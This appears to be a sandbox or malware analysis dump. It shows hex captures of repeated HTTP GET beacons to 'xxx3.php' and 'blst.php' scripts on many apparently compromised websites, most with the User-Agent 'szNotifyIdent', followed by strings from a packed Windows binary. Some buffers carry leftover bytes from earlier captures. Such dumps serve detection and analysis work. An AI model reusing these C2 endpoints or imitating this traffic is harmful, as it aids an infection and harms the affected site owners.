0x00000000 (00000)   47455420 2f73706f 72742f6f 6d656761   GET /sport/omega
0x00000010 (00016)   2f706963 2f6f6d65 67612f78 7878332e   /pic/omega/xxx3.
0x00000020 (00032)   7068703f 703d3233 34323226 69643d34   php?p=23422&id=4
0x00000030 (00048)   32363732 36313138 26653d34 32363132   26726118&e=42612
0x00000040 (00064)   31362048 5454502f 312e310d 0a557365   16 HTTP/1.1..Use
0x00000050 (00080)   722d4167 656e743a 20737a4e 6f746966   r-Agent: szNotif
0x00000060 (00096)   79496465 6e740d0a 486f7374 3a207777   yIdent..Host: ww
0x00000070 (00112)   772e6d69 72616765 2e72750d 0a0d0a6f   w.mirage.ru....o
0x00000080 (00128)   7773204e 5420352e 313b2053 56313b20   ws NT 5.1; SV1; 
0x00000090 (00144)   2e4e4554 20434c52 20322e30 2e353037   .NET CLR 2.0.507
0x000000a0 (00160)   3237290d 0a486f73 743a2076 7365726f   27)..Host: vsero
0x000000b0 (00176)   7a65746b 692e7275 0d0a436f 6e6e6563   zetki.ru..Connec
0x000000c0 (00192)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000d0 (00208)   0d0a0d0a 0d0a0a69 76650d0a 0d0a436f   .......ive....Co
0x000000e0 (00224)   6e6e6563 74696f6e 3a204b65 65702d41   nnection: Keep-A
0x000000f0 (00240)   6c697665 0d0a0d0a 74206120 72657175   live....t a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f696d61 6765732f 6c756469   GET /images/ludi
0x00000010 (00016)   2f626c73 742e7068 70204854 54502f31   /blst.php HTTP/1
0x00000020 (00032)   2e310d0a 41636365 70743a20 2a2f2a0d   .1..Accept: */*.
0x00000030 (00048)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000040 (00064)   3a20677a 69702c20 6465666c 6174650d   : gzip, deflate.
0x00000050 (00080)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000060 (00096)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000070 (00112)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000080 (00128)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x00000090 (00144)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000a0 (00160)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host: 
0x000000b0 (00176)   7777772e 62656c74 65682e72 750d0a43   www.belteh.ru..C
0x000000c0 (00192)   6f6e6e65 6374696f 6e3a204b 6565702d   onnection: Keep-
0x000000d0 (00208)   416c6976 650d0a0d 0a650d0a 0d0a436f   Alive....e....Co
0x000000e0 (00224)   6e6e6563 74696f6e 3a204b65 65702d41   nnection: Keep-A
0x000000f0 (00240)   6c697665 0d0a0d0a 74206120 72657175   live....t a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f696d67 2f706174 682f7878   GET /img/path/xx
0x00000010 (00016)   78332e70 68703f70 3d323334 32322669   x3.php?p=23422&i
0x00000020 (00032)   643d3432 36373236 31313826 653d3432   d=426726118&e=42
0x00000030 (00048)   36313231 36204854 54502f31 2e310d0a   61216 HTTP/1.1..
0x00000040 (00064)   55736572 2d416765 6e743a20 737a4e6f   User-Agent: szNo
0x00000050 (00080)   74696679 4964656e 740d0a48 6f73743a   tifyIdent..Host:
0x00000060 (00096)   20386d61 7274612e 72750d0a 0d0a6174    8marta.ru....at
0x00000070 (00112)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000080 (00128)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x00000090 (00144)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000a0 (00160)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host: 
0x000000b0 (00176)   7777772e 62656c74 65682e72 750d0a43   www.belteh.ru..C
0x000000c0 (00192)   6f6e6e65 6374696f 6e3a204b 6565702d   onnection: Keep-
0x000000d0 (00208)   416c6976 650d0a0d 0a650d0a 0d0a436f   Alive....e....Co
0x000000e0 (00224)   6e6e6563 74696f6e 3a204b65 65702d41   nnection: Keep-A
0x000000f0 (00240)   6c697665 0d0a0d0a 74206120 72657175   live....t a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f696d61 6765732f 78787833   GET /images/xxx3
0x00000010 (00016)   2e706870 3f703d32 33343232 2669643d   .php?p=23422&id=
0x00000020 (00032)   34323637 32363131 3826653d 34323631   426726118&e=4261
0x00000030 (00048)   32313620 48545450 2f312e31 0d0a5573   216 HTTP/1.1..Us
0x00000040 (00064)   65722d41 67656e74 3a20737a 4e6f7469   er-Agent: szNoti
0x00000050 (00080)   66794964 656e740d 0a486f73 743a2061   fyIdent..Host: a
0x00000060 (00096)   7376742e 72750d0a 0d0a0d0a 0d0a6174   svt.ru........at
0x00000070 (00112)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000080 (00128)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x00000090 (00144)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000a0 (00160)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host: 
0x000000b0 (00176)   7777772e 62656c74 65682e72 750d0a43   www.belteh.ru..C
0x000000c0 (00192)   6f6e6e65 6374696f 6e3a204b 6565702d   onnection: Keep-
0x000000d0 (00208)   416c6976 650d0a0d 0a650d0a 0d0a436f   Alive....e....Co
0x000000e0 (00224)   6e6e6563 74696f6e 3a204b65 65702d41   nnection: Keep-A
0x000000f0 (00240)   6c697665 0d0a0d0a 74206120 72657175   live....t a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f696d61 6765732f 62617365   GET /images/base
0x00000010 (00016)   2f6f7269 672f7878 78332e70 68703f70   /orig/xxx3.php?p
0x00000020 (00032)   3d323334 32322669 643d3432 36373236   =23422&id=426726
0x00000030 (00048)   31313826 653d3432 36313231 36204854   118&e=4261216 HT
0x00000040 (00064)   54502f31 2e310d0a 55736572 2d416765   TP/1.1..User-Age
0x00000050 (00080)   6e743a20 737a4e6f 74696679 4964656e   nt: szNotifyIden
0x00000060 (00096)   740d0a48 6f73743a 2063616c 696d6173   t..Host: calimas
0x00000070 (00112)   7572662e 636f6d0d 0a0d0a36 2e303b20   urf.com....6.0; 
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f696d61 6765732f 78787833   GET /images/xxx3
0x00000010 (00016)   2e706870 3f703d32 33343232 2669643d   .php?p=23422&id=
0x00000020 (00032)   34323637 32363131 3826653d 34323631   426726118&e=4261
0x00000030 (00048)   32313620 48545450 2f312e31 0d0a5573   216 HTTP/1.1..Us
0x00000040 (00064)   65722d41 67656e74 3a20737a 4e6f7469   er-Agent: szNoti
0x00000050 (00080)   66794964 656e740d 0a486f73 743a2063   fyIdent..Host: c
0x00000060 (00096)   656c6562 72617469 6f6e7369 6e737061   elebrationsinspa
0x00000070 (00112)   696e2e63 6f6d0d0a 0d0a0a36 2e303b20   in.com.....6.0; 
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f696d61 6765732f 78787833   GET /images/xxx3
0x00000010 (00016)   2e706870 3f703d32 33343232 2669643d   .php?p=23422&id=
0x00000020 (00032)   34323637 32363131 3826653d 34323631   426726118&e=4261
0x00000030 (00048)   32313620 48545450 2f312e31 0d0a5573   216 HTTP/1.1..Us
0x00000040 (00064)   65722d41 67656e74 3a20737a 4e6f7469   er-Agent: szNoti
0x00000050 (00080)   66794964 656e740d 0a486f73 743a2064   fyIdent..Host: d
0x00000060 (00096)   6d61782e 72750d0a 0d0a7369 6e737061   max.ru....sinspa
0x00000070 (00112)   696e2e63 6f6d0d0a 0d0a0a36 2e303b20   in.com.....6.0; 
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f696d61 6765732f 78787833   GET /images/xxx3
0x00000010 (00016)   2e706870 3f703d32 33343232 2669643d   .php?p=23422&id=
0x00000020 (00032)   34323637 32363131 3826653d 34323631   426726118&e=4261
0x00000030 (00048)   32313620 48545450 2f312e31 0d0a5573   216 HTTP/1.1..Us
0x00000040 (00064)   65722d41 67656e74 3a20737a 4e6f7469   er-Agent: szNoti
0x00000050 (00080)   66794964 656e740d 0a486f73 743a2065   fyIdent..Host: e
0x00000060 (00096)   6670612d 65672e6e 65740d0a 0d0a7061   fpa-eg.net....pa
0x00000070 (00112)   696e2e63 6f6d0d0a 0d0a0a36 2e303b20   in.com.....6.0; 
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f706c61 79697473 6166652f   GET /playitsafe/
0x00000010 (00016)   696d6167 65732f62 6c73742e 70687020   images/blst.php 
0x00000020 (00032)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000030 (00048)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000040 (00064)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000050 (00080)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000060 (00096)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000070 (00112)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000080 (00128)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000090 (00144)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x000000a0 (00160)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000b0 (00176)   486f7374 3a207777 772e656e 65727465   Host: www.enerte
0x000000c0 (00192)   6c6c6967 656e6365 2e636f6d 0d0a436f   lligence.com..Co
0x000000d0 (00208)   6e6e6563 74696f6e 3a204b65 65702d41   nnection: Keep-A
0x000000e0 (00224)   6c697665 0d0a0d0a 20e91a8d 017f       live.... .....

0x00000000 (00000)   47455420 2f696d61 6765732f 78787833   GET /images/xxx3
0x00000010 (00016)   2e706870 3f703d32 33343232 2669643d   .php?p=23422&id=
0x00000020 (00032)   34323637 32363131 3826653d 34323631   426726118&e=4261
0x00000030 (00048)   32313620 48545450 2f312e31 0d0a5573   216 HTTP/1.1..Us
0x00000040 (00064)   65722d41 67656e74 3a20737a 4e6f7469   er-Agent: szNoti
0x00000050 (00080)   66794964 656e740d 0a486f73 743a2066   fyIdent..Host: f
0x00000060 (00096)   696e616e 6369616c 62757369 6e657373   inancialbusiness
0x00000070 (00112)   2e63610d 0a0d0a62 6c653b20 4d534945   .ca....ble; MSIE
0x00000080 (00128)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000090 (00144)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x000000a0 (00160)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000b0 (00176)   486f7374 3a207777 772e656e 65727465   Host: www.enerte
0x000000c0 (00192)   6c6c6967 656e6365 2e636f6d 0d0a436f   lligence.com..Co
0x000000d0 (00208)   6e6e6563 74696f6e 3a204b65 65702d41   nnection: Keep-A
0x000000e0 (00224)   6c697665 0d0a0d0a 20e91a8d 017f       live.... .....

0x00000000 (00000)   47455420 2f696d61 6765732f 626c7374   GET /images/blst
0x00000010 (00016)   2e706870 20485454 502f312e 310d0a41   .php HTTP/1.1..A
0x00000020 (00032)   63636570 743a202a 2f2a0d0a 41636365   ccept: */*..Acce
0x00000030 (00048)   70742d45 6e636f64 696e673a 20677a69   pt-Encoding: gzi
0x00000040 (00064)   702c2064 65666c61 74650d0a 55736572   p, deflate..User
0x00000050 (00080)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000060 (00096)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000070 (00112)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x00000080 (00128)   7773204e 5420352e 313b2053 56313b20   ws NT 5.1; SV1; 
0x00000090 (00144)   2e4e4554 20434c52 20322e30 2e353037   .NET CLR 2.0.507
0x000000a0 (00160)   3237290d 0a486f73 743a2077 77772e65   27)..Host: www.e
0x000000b0 (00176)   6e6b6f72 2e72750d 0a436f6e 6e656374   nkor.ru..Connect
0x000000c0 (00192)   696f6e3a 204b6565 702d416c 6976650d   ion: Keep-Alive.
0x000000d0 (00208)   0a0d0a63 74696f6e 3a204b65 65702d41   ...ction: Keep-A
0x000000e0 (00224)   6c697665 0d0a0d0a 20e91a8d 017f       live.... .....

0x00000000 (00000)   47455420 2f696d61 6765732f 78787833   GET /images/xxx3
0x00000010 (00016)   2e706870 3f703d32 33343232 2669643d   .php?p=23422&id=
0x00000020 (00032)   34323637 32363131 3826653d 34323631   426726118&e=4261
0x00000030 (00048)   32313620 48545450 2f312e31 0d0a5573   216 HTTP/1.1..Us
0x00000040 (00064)   65722d41 67656e74 3a20737a 4e6f7469   er-Agent: szNoti
0x00000050 (00080)   66794964 656e740d 0a486f73 743a2067   fyIdent..Host: g
0x00000060 (00096)   6f6c6465 6e2d7269 6e672e6e 65740d0a   olden-ring.net..
0x00000070 (00112)   0d0a5349 4520362e 303b2057 696e646f   ..SIE 6.0; Windo
0x00000080 (00128)   7773204e 5420352e 313b2053 56313b20   ws NT 5.1; SV1; 
0x00000090 (00144)   2e4e4554 20434c52 20322e30 2e353037   .NET CLR 2.0.507
0x000000a0 (00160)   3237290d 0a486f73 743a2077 77772e65   27)..Host: www.e
0x000000b0 (00176)   6e6b6f72 2e72750d 0a436f6e 6e656374   nkor.ru..Connect
0x000000c0 (00192)   696f6e3a 204b6565 702d416c 6976650d   ion: Keep-Alive.
0x000000d0 (00208)   0a0d0a63 74696f6e 3a204b65 65702d41   ...ction: Keep-A
0x000000e0 (00224)   6c697665 0d0a0d0a 20e91a8d 017f       live.... .....

0x00000000 (00000)   47455420 2f696d61 6765732f 69636f6e   GET /images/icon
0x00000010 (00016)   2f6a7067 2f626c6f 672f626c 73742e70   /jpg/blog/blst.p
0x00000020 (00032)   68702048 5454502f 312e310d 0a416363   hp HTTP/1.1..Acc
0x00000030 (00048)   6570743a 202a2f2a 0d0a4163 63657074   ept: */*..Accept
0x00000040 (00064)   2d456e63 6f64696e 673a2067 7a69702c   -Encoding: gzip,
0x00000050 (00080)   20646566 6c617465 0d0a5573 65722d41    deflate..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e313b 20535631 3b202e4e    NT 5.1; SV1; .N
0x000000a0 (00160)   45542043 4c522032 2e302e35 30373237   ET CLR 2.0.50727
0x000000b0 (00176)   290d0a48 6f73743a 20777777 2e672d61   )..Host: www.g-a
0x000000c0 (00192)   6e747373 6f66742e 636f6d0d 0a436f6e   ntssoft.com..Con
0x000000d0 (00208)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x000000e0 (00224)   6976650d 0a0d0a0a 20e91a8d 017f       ive..... .....

0x00000000 (00000)   47455420 2f696d61 6765732f 78787833   GET /images/xxx3
0x00000010 (00016)   2e706870 3f703d32 33343232 2669643d   .php?p=23422&id=
0x00000020 (00032)   34323637 32363131 3826653d 34323631   426726118&e=4261
0x00000030 (00048)   32313620 48545450 2f312e31 0d0a5573   216 HTTP/1.1..Us
0x00000040 (00064)   65722d41 67656e74 3a20737a 4e6f7469   er-Agent: szNoti
0x00000050 (00080)   66794964 656e740d 0a486f73 743a206a   fyIdent..Host: j
0x00000060 (00096)   616d6d69 6e6a6f2e 636f6d0d 0a0d0a2e   amminjo.com.....
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e313b 20535631 3b202e4e    NT 5.1; SV1; .N
0x000000a0 (00160)   45542043 4c522032 2e302e35 30373237   ET CLR 2.0.50727
0x000000b0 (00176)   290d0a48 6f73743a 20777777 2e672d61   )..Host: www.g-a
0x000000c0 (00192)   6e747373 6f66742e 636f6d0d 0a436f6e   ntssoft.com..Con
0x000000d0 (00208)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x000000e0 (00224)   6976650d 0a0d0a0a 20e91a8d 017f       ive..... .....

0x00000000 (00000)   47455420 2f696d61 6765732f 78787833   GET /images/xxx3
0x00000010 (00016)   2e706870 3f703d32 33343232 2669643d   .php?p=23422&id=
0x00000020 (00032)   34323637 32363131 3826653d 34323631   426726118&e=4261
0x00000030 (00048)   32313620 48545450 2f312e31 0d0a5573   216 HTTP/1.1..Us
0x00000040 (00064)   65722d41 67656e74 3a20737a 4e6f7469   er-Agent: szNoti
0x00000050 (00080)   66794964 656e740d 0a486f73 743a206b   fyIdent..Host: k
0x00000060 (00096)   6d6f6c64 2e62697a 0d0a0d0a 0a0d0a2e   mold.biz........
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e313b 20535631 3b202e4e    NT 5.1; SV1; .N
0x000000a0 (00160)   45542043 4c522032 2e302e35 30373237   ET CLR 2.0.50727
0x000000b0 (00176)   290d0a48 6f73743a 20777777 2e672d61   )..Host: www.g-a
0x000000c0 (00192)   6e747373 6f66742e 636f6d0d 0a436f6e   ntssoft.com..Con
0x000000d0 (00208)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x000000e0 (00224)   6976650d 0a0d0a0a 20e91a8d 017f       ive..... .....

0x00000000 (00000)   47455420 2f696d61 6765732f 78787833   GET /images/xxx3
0x00000010 (00016)   2e706870 3f703d32 33343232 2669643d   .php?p=23422&id=
0x00000020 (00032)   34323637 32363131 3826653d 34323631   426726118&e=4261
0x00000030 (00048)   32313620 48545450 2f312e31 0d0a5573   216 HTTP/1.1..Us
0x00000040 (00064)   65722d41 67656e74 3a20737a 4e6f7469   er-Agent: szNoti
0x00000050 (00080)   66794964 656e740d 0a486f73 743a206b   fyIdent..Host: k
0x00000060 (00096)   6f6b6f6e 2e636f6d 0d0a0d0a            okon.com....

0x00000000 (00000)   47455420 2f696d61 6765732f 78787833   GET /images/xxx3
0x00000010 (00016)   2e706870 3f703d32 33343232 2669643d   .php?p=23422&id=
0x00000020 (00032)   34323637 32363131 3826653d 34323631   426726118&e=4261
0x00000030 (00048)   32313620 48545450 2f312e31 0d0a5573   216 HTTP/1.1..Us
0x00000040 (00064)   65722d41 67656e74 3a20737a 4e6f7469   er-Agent: szNoti
0x00000050 (00080)   66794964 656e740d 0a486f73 743a206b   fyIdent..Host: k
0x00000060 (00096)   6f6d742e 72750d0a 0d0a0d0a            omt.ru......

0x00000000 (00000)   47455420 2f696d61 6765732f 78787833   GET /images/xxx3
0x00000010 (00016)   2e706870 3f703d32 33343232 2669643d   .php?p=23422&id=
0x00000020 (00032)   34323637 32363131 3826653d 34323631   426726118&e=4261
0x00000030 (00048)   32313620 48545450 2f312e31 0d0a5573   216 HTTP/1.1..Us
0x00000040 (00064)   65722d41 67656e74 3a20737a 4e6f7469   er-Agent: szNoti
0x00000050 (00080)   66794964 656e740d 0a486f73 743a206d   fyIdent..Host: m
0x00000060 (00096)   65726b75 722d616b 6164656d 69652e64   erkur-akademie.d
0x00000070 (00112)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f687464 6f63732f 696d672f   GET /htdocs/img/
0x00000010 (00016)   78787833 2e706870 3f703d32 33343232   xxx3.php?p=23422
0x00000020 (00032)   2669643d 34323637 32363131 3826653d   &id=426726118&e=
0x00000030 (00048)   34323631 32313620 48545450 2f312e31   4261216 HTTP/1.1
0x00000040 (00064)   0d0a5573 65722d41 67656e74 3a20737a   ..User-Agent: sz
0x00000050 (00080)   4e6f7469 66794964 656e740d 0a486f73   NotifyIdent..Hos
0x00000060 (00096)   743a206e 616b6f72 61626c65 2e72750d   t: nakorable.ru.
0x00000070 (00112)   0a0d0a0d 0a                           .....

0x00000000 (00000)   47455420 2f68746d 6c2f6661 6e6b6c75   GET /html/fanklu
0x00000010 (00016)   622f7878 78332e70 68703f70 3d323334   b/xxx3.php?p=234
0x00000020 (00032)   32322669 643d3432 36373236 31313826   22&id=426726118&
0x00000030 (00048)   653d3432 36313231 36204854 54502f31   e=4261216 HTTP/1
0x00000040 (00064)   2e310d0a 55736572 2d416765 6e743a20   .1..User-Agent: 
0x00000050 (00080)   737a4e6f 74696679 4964656e 740d0a48   szNotifyIdent..H
0x00000060 (00096)   6f73743a 2072617a 2d6e6172 617a2e77   ost: raz-naraz.w
0x00000070 (00112)   7a2e637a 0d0a0d0a 7469626c 653b204d   z.cz....tible; M
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f696d61 6765732f 78787833   GET /images/xxx3
0x00000010 (00016)   2e706870 3f703d32 33343232 2669643d   .php?p=23422&id=
0x00000020 (00032)   34323637 32363131 3826653d 34323631   426726118&e=4261
0x00000030 (00048)   32313620 48545450 2f312e31 0d0a5573   216 HTTP/1.1..Us
0x00000040 (00064)   65722d41 67656e74 3a20737a 4e6f7469   er-Agent: szNoti
0x00000050 (00080)   66794964 656e740d 0a486f73 743a2072   fyIdent..Host: r
0x00000060 (00096)   65647368 6f702e72 750d0a0d 0a7a2e77   edshop.ru....z.w
0x00000070 (00112)   7a2e637a 0d0a0d0a 7469626c 653b204d   z.cz....tible; M
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f696d61 6765732f 78787833   GET /images/xxx3
0x00000010 (00016)   2e706870 3f703d32 33343232 2669643d   .php?p=23422&id=
0x00000020 (00032)   34323637 32363131 3826653d 34323631   426726118&e=4261
0x00000030 (00048)   32313620 48545450 2f312e31 0d0a5573   216 HTTP/1.1..Us
0x00000040 (00064)   65722d41 67656e74 3a20737a 4e6f7469   er-Agent: szNoti
0x00000050 (00080)   66794964 656e740d 0a486f73 743a2073   fyIdent..Host: s
0x00000060 (00096)   7062736f 2e72750d 0a0d0a0d 0a7a2e77   pbso.ru......z.w
0x00000070 (00112)   7a2e637a 0d0a0d0a 7469626c 653b204d   z.cz....tible; M
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f696d67 2f787878 332e7068   GET /img/xxx3.ph
0x00000010 (00016)   703f703d 32333432 32266964 3d343236   p?p=23422&id=426
0x00000020 (00032)   37323631 31382665 3d343236 31323136   726118&e=4261216
0x00000030 (00048)   20485454 502f312e 310d0a55 7365722d    HTTP/1.1..User-
0x00000040 (00064)   4167656e 743a2073 7a4e6f74 69667949   Agent: szNotifyI
0x00000050 (00080)   64656e74 0d0a486f 73743a20 7472616e   dent..Host: tran
0x00000060 (00096)   73616572 6f746f75 72732e72 750d0a0d   saerotours.ru...
0x00000070 (00112)   0a2e637a 0d0a0d0a 7469626c 653b204d   ..cz....tible; M
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f626c6f 672f696d 61676573   GET /blog/images
0x00000010 (00016)   2f636f6c 6f72732f 78787833 2e706870   /colors/xxx3.php
0x00000020 (00032)   3f703d32 33343232 2669643d 34323637   ?p=23422&id=4267
0x00000030 (00048)   32363131 3826653d 34323631 32313620   26118&e=4261216 
0x00000040 (00064)   48545450 2f312e31 0d0a5573 65722d41   HTTP/1.1..User-A
0x00000050 (00080)   67656e74 3a20737a 4e6f7469 66794964   gent: szNotifyId
0x00000060 (00096)   656e740d 0a486f73 743a2077 77772e6b   ent..Host: www.k
0x00000070 (00112)   61746a61 732d7265 6973656e 2e64650d   atjas-reisen.de.
0x00000080 (00128)   0a0d0a20 362e303b 20850902            ... 6.0; ...

0x00000000 (00000)   47455420 2f696d61 6765732f 5f767469   GET /images/_vti
0x00000010 (00016)   5f636e66 2f787878 332e7068 703f703d   _cnf/xxx3.php?p=
0x00000020 (00032)   32333432 32266964 3d343236 37323631   23422&id=4267261
0x00000030 (00048)   31382665 3d343236 31323136 20485454   18&e=4261216 HTT
0x00000040 (00064)   502f312e 310d0a55 7365722d 4167656e   P/1.1..User-Agen
0x00000050 (00080)   743a2073 7a4e6f74 69667949 64656e74   t: szNotifyIdent
0x00000060 (00096)   0d0a486f 73743a20 7777772e 6d6f7363   ..Host: www.mosc
0x00000070 (00112)   6f776170 6172746d 656e7473 2e72750d   owapartments.ru.
0x00000080 (00128)   0a0d0a20 362e303b 20850902            ... 6.0; ...

0x00000000 (00000)   47455420 2f696d61 6765732f 78787833   GET /images/xxx3
0x00000010 (00016)   2e706870 3f703d32 33343232 2669643d   .php?p=23422&id=
0x00000020 (00032)   34323637 32363131 3826653d 34323631   426726118&e=4261
0x00000030 (00048)   32313620 48545450 2f312e31 0d0a5573   216 HTTP/1.1..Us
0x00000040 (00064)   65722d41 67656e74 3a20737a 4e6f7469   er-Agent: szNoti
0x00000050 (00080)   66794964 656e740d 0a486f73 743a2077   fyIdent..Host: w
0x00000060 (00096)   77772e70 6563686b 692e7275 0d0a0d0a   ww.pechki.ru....
0x00000070 (00112)   6f776170 6172746d 656e7473 2e72750d   owapartments.ru.
0x00000080 (00128)   0a0d0a20 362e303b 20850902            ... 6.0; ...

0x00000000 (00000)   47455420 2f696d61 6765732f 78787833   GET /images/xxx3
0x00000010 (00016)   2e706870 3f703d32 33343232 2669643d   .php?p=23422&id=
0x00000020 (00032)   34323637 32363131 3826653d 34323631   426726118&e=4261
0x00000030 (00048)   32313620 48545450 2f312e31 0d0a5573   216 HTTP/1.1..Us
0x00000040 (00064)   65722d41 67656e74 3a20737a 4e6f7469   er-Agent: szNoti
0x00000050 (00080)   66794964 656e740d 0a486f73 743a2077   fyIdent..Host: w
0x00000060 (00096)   77772e72 686f6e65 2e63680d 0a0d0a     ww.rhone.ch....

0x00000000 (00000)   47455420 2f696d61 6765732f 78787833   GET /images/xxx3
0x00000010 (00016)   2e706870 3f703d32 33343232 2669643d   .php?p=23422&id=
0x00000020 (00032)   34323637 32363131 3826653d 34323631   426726118&e=4261
0x00000030 (00048)   32313620 48545450 2f312e31 0d0a5573   216 HTTP/1.1..Us
0x00000040 (00064)   65722d41 67656e74 3a20737a 4e6f7469   er-Agent: szNoti
0x00000050 (00080)   66794964 656e740d 0a486f73 743a2077   fyIdent..Host: w
0x00000060 (00096)   77772e7a 646f6d2e 72750d0a 0d0a0a     ww.zdom.ru.....


Strings
9b0)[#
\9h8[W
_:aKERNEL32.DLL
D7nkiVT&
d=CMb]
eB|myGk
GetProcAddress
LoadLibraryA
>mW@7>5[
(%&;~o"
PMJM<k
QLVZNA{\\
	$V/,7V/!R
yu^Ops::